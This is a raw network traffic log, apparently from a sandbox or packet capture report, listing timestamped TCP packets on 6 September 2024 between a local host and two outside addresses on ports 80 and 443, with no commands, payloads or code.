                          Sep 6, 2024 11:25:58.896338940 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.896354914 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.896362066 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.896369934 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.896375895 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.896383047 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.896404982 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.901165962 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.901187897 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.901204109 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.901218891 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.901222944 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.901242018 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.901247978 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.905936003 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.905953884 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.905966043 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.905977011 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.905989885 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.905992985 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.906019926 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.906019926 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.906033039 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.910881042 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.910903931 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.910916090 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.910928011 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.910938025 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.910939932 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.910950899 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.910954952 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.910962105 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.910964012 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.910974026 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.910984993 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.910995960 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.910996914 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.911007881 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.911015034 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.911019087 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.911021948 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.911034107 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.911043882 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.911053896 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.911071062 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.911237955 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.959114075 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.959131956 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.959148884 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.959160089 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.959171057 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.959182978 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.959314108 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.959711075 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.959722996 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.959733963 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.959744930 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.959779978 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.959794998 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.960268974 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.960280895 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.960299015 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.960309982 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.960314035 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.960321903 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.960334063 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.960334063 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.960340023 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.960360050 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.960376024 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.961175919 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.961186886 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.961205959 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.961218119 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.961229086 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.961230993 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.961239100 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.961241961 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.961249113 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.961266041 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.961278915 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.962147951 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.962158918 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.962169886 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.962182045 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.962193012 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.962196112 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.962204933 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.962210894 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.962228060 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.962238073 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.963067055 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.963078022 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.963088989 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.963102102 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.963113070 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.963113070 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.963125944 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.963126898 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.963141918 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.963160992 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.963974953 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.963987112 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.963998079 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.964008093 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.964025021 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.964027882 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.964034081 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.964040041 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.964051962 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.964062929 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.964077950 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.964931011 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.964941978 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.964951992 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.964972973 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.964982033 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.964982033 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.964986086 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.964997053 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.965009928 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.965015888 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.965029955 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.965837955 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.965858936 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.965884924 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.965894938 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.965913057 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.965924978 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.965935946 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.965948105 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.965965986 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.965970993 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.966622114 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.966665983 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.966679096 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.966691017 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.966723919 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.966733932 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.966788054 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.966799974 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.966809988 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.966831923 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.966842890 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.967596054 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.967607975 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.967618942 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.967644930 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.967655897 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.967998028 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.968010902 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.968028069 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.968039036 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.968049049 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.968049049 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.968060970 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.968060970 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.968074083 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.968080044 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.968097925 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.968106985 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.968976021 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.968990088 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.969003916 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.969022036 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.969031096 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.969341040 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.969353914 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.969366074 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.969376087 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.969388962 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.969392061 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.969403028 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.969403982 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.969414949 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.969425917 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.969425917 CEST804916185.239.241.184192.168.2.22
                          Sep 6, 2024 11:25:58.969439983 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:58.969456911 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:25:59.342411041 CEST4916180192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:01.961340904 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:01.961368084 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:01.961427927 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:01.964991093 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:01.965006113 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.563524961 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.563585997 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.568965912 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.568974018 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.569291115 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.641969919 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.688503027 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.874737024 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.874799013 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.874876976 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.874887943 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.874900103 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.874938011 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.874944925 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.875495911 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.875551939 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.875560045 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.942234993 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.942332983 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.942342997 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.961273909 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.961348057 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.961354971 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.961376905 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.961424112 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.961431026 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.962102890 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.962143898 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.962152958 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.962158918 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.962193966 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.962198973 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.963006973 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.963042021 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.963047981 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:02.963061094 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.963078976 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:02.963084936 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.009812117 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.009946108 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.009953022 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.028794050 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.028876066 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.028882980 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.029004097 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.029037952 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.029045105 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.029047012 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.029072046 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.029088974 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.048156023 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.048247099 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.048254013 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.048369884 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.048409939 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.048417091 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.048440933 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.048449039 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.048474073 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.049144983 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.049213886 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.053750038 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.053756952 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.053822041 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.054275036 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.054277897 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.054286003 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.054323912 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.054338932 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.054356098 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.054363012 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.054368973 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.054383039 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.054402113 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.054426908 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.055212975 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.055294991 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.078916073 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.078996897 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.097879887 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.097942114 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.115622997 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.115675926 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.115706921 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.115752935 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.115917921 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.115964890 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.136034966 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.136087894 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.136207104 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.136259079 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.136684895 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.136734009 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.136933088 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.136967897 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.136981964 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.136991978 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.137007952 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.137479067 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.137523890 CEST49162443192.168.2.22207.241.224.2
Sep 6, 2024 11:26:03.137531996 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.137686014 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.137722015 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.137737036 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.137743950 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.137768030 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.138202906 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.138262033 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.138268948 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.138391972 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.138430119 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.138437986 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.138443947 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.138499022 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.139363050 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.139396906 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.139437914 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.139444113 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.139473915 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.140362978 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.140400887 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.140422106 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.140429974 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.140453100 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.140506029 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.140561104 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.140597105 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.140610933 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.140618086 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.140638113 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.140710115 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.141288042 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.141338110 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.168551922 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.168596983 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.168618917 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.168627024 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.168654919 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.168725967 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.168772936 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.168781042 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.183317900 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.183459997 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.183468103 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.183612108 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.183657885 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.183665037 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.183870077 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.183921099 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.183933973 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.204299927 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.204341888 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.204369068 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.204389095 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.204407930 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.204413891 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.204464912 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.204479933 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.204655886 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.204687119 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.204706907 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.204722881 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.204754114 CEST  49162  443    192.168.2.22   207.241.224.2
